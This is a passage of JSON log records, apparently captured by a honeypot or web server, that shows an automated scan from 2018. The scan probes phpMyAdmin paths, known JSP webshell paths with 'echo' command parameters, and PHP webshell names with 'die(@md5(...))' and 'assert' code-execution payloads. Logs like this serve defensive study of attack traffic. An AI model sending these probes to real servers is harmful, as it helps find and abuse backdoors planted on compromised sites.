- "@timestamp": "2018-12-17T09:40:28.000Z",
- "data": "GET /admin/PMA/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:28.000Z",
- "data": "GET /web/phpMyAdmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:28.000Z",
- "data": "GET /admin/pma/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:27.000Z",
- "data": "GET /dbadmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:27.000Z",
- "data": "GET /db/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:26.000Z",
- "data": "GET /admin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:26.000Z",
- "data": "GET /pmamy2/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:26.000Z",
- "data": "GET /mysql/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:25.000Z",
- "data": "GET /pmamy/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:24.000Z",
- "data": "GET /PMA2/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:24.000Z",
- "data": "GET /pma/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:24.000Z",
- "data": "GET /PMA/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:23.000Z",
- "data": "GET /pmd/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:23.000Z",
- "data": "GET /phpMyAdmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:22.000Z",
- "data": "GET /index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:22.000Z",
- "data": "GET /a/pwn.jsp?cmd=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:22.000Z",
- "data": "GET /phpmyadmin/index.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:21.000Z",
- "data": "GET /HCEGH/xunfeng.jsp?comment=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:20.000Z",
- "data": "GET /wstats/wstats.jsp?comment=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:20.000Z",
- "data": "GET /idssvc/idssvc.jsp?comment=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:20.000Z",
- "data": "GET /iesvc/iesvc.jsp?comment=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:19.000Z",
- "data": "GET /zecmd/zecmd.jsp?comment=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:19.000Z",
- "data": "GET /shellinvoker/shellinvoker.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: jexboss\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:18.000Z",
- "data": "GET /dread/lock.jsp?tezaz=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:18.000Z",
- "data": "GET /jbws/jbws.jsp?eval=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: jbosses\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:18.000Z",
- "data": "GET /jvrx/cmd.jsp?pwd=everymorning\u0026cmd=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:17.000Z",
- "data": "GET /demo/404.jsp?bjh=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:16.000Z",
- "data": "GET /console/jspzxc.jsp?cmd=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:16.000Z",
- "data": "GET /jexinv4/jexinv4.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:16.000Z",
- "data": "GET /jbossass/jbossass.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: jexboss\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:15.000Z",
- "data": "GET /jexinv/jexinv.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:15.000Z",
- "data": "GET /jexinv3/jexinv3.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:14.000Z",
- "data": "GET /jexws2/jexws2.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:14.000Z",
- "data": "GET /jexws3/jexws3.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:14.000Z",
- "data": "GET /jexws4/jexws4.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:13.000Z",
- "data": "GET /jexsw2/jexsw2.jsp?ppp=echo%20Hello%20D3c3mb3r HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: test\r\ncheck-updates: false\r\nno-check-updates: true\r\nHost: 127.0.0.1\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n"
- },
- {
- "@timestamp": "2018-12-17T09:40:12.000Z",
- "data": "POST /test.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 33\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nd=Assert\u0026Arui=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:40:12.000Z",
- "data": "POST /mm.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 33\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nd=Assert\u0026Arui=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:40:12.000Z",
- "data": "POST /1q.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncmd=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:40:11.000Z",
- "data": "POST /cadre.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nadmin=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:40:11.000Z",
- "data": "POST /51.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 28\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nusername=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:40:10.000Z",
- "data": "POST /MCLi.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nope=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:10.000Z",
- "data": "POST /MCLi.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n4=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:40:10.000Z",
- "data": "POST /qq5262.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 27\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nqq5262=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:09.000Z",
- "data": "POST /j.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n1=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:08.000Z",
- "data": "POST /xiaoyu.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nlx=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:08.000Z",
- "data": "POST /xiaomo.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nmo=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:08.000Z",
- "data": "POST /xiaohei.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 28\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nxiaohei=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:07.000Z",
- "data": "POST /db.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nffdd3=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:07.000Z",
- "data": "POST /hacly.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nhacly=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:06.000Z",
- "data": "POST /cxfm666.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 28\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncxfm666=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:06.000Z",
- "data": "POST /angge.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 26\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nangge=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:04.000Z",
- "data": "POST /log.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nl=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:04.000Z",
- "data": "POST /data.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncmd=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:04.000Z",
- "data": "POST /qq.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncmd=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:03.000Z",
- "data": "POST /xiaomar.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncmd=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:03.000Z",
- "data": "POST /xiaomae.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncmd=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:02.000Z",
- "data": "POST /z.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nz=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:02.000Z",
- "data": "POST /xiaoma.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncmd=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:02.000Z",
- "data": "POST /7.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 27\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nxiaoma=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:01.000Z",
- "data": "POST /yj.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 23\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nyj=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:00.000Z",
- "data": "POST /wb.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n1=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:00.000Z",
- "data": "POST /uu.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nxiao=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:40:00.000Z",
- "data": "POST /aa.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 22\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\na=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:59.000Z",
- "data": "POST /toor.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nqwer=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:59.000Z",
- "data": "POST /zzk.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 29\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nxiaopang=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:58.000Z",
- "data": "POST /htfr.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nzuo=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:58.000Z",
- "data": "POST /infos.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 25\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nname=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:58.000Z",
- "data": "POST /x.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 24\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\ncmd=die(@md5(D3c3mb3r));"
- },
- {
- "@timestamp": "2018-12-17T09:39:57.000Z",
- "data": "POST /.php HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0\r\nHost: 127.0.0.1\r\nContent-Length: 21\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nm=die(@md5(D3c3mb3r))"
- },
- {
- "@timestamp": "2018-12-17T09:39:56.000Z",
